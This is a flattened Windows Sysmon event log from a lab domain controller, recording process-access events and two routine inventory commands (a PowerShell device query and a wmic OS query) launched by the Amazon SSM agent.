13:34:22.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.579{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.580{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.548{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.548{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.544{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.538{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.537{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.537{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.537{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.537{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.535{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.535{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.535{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 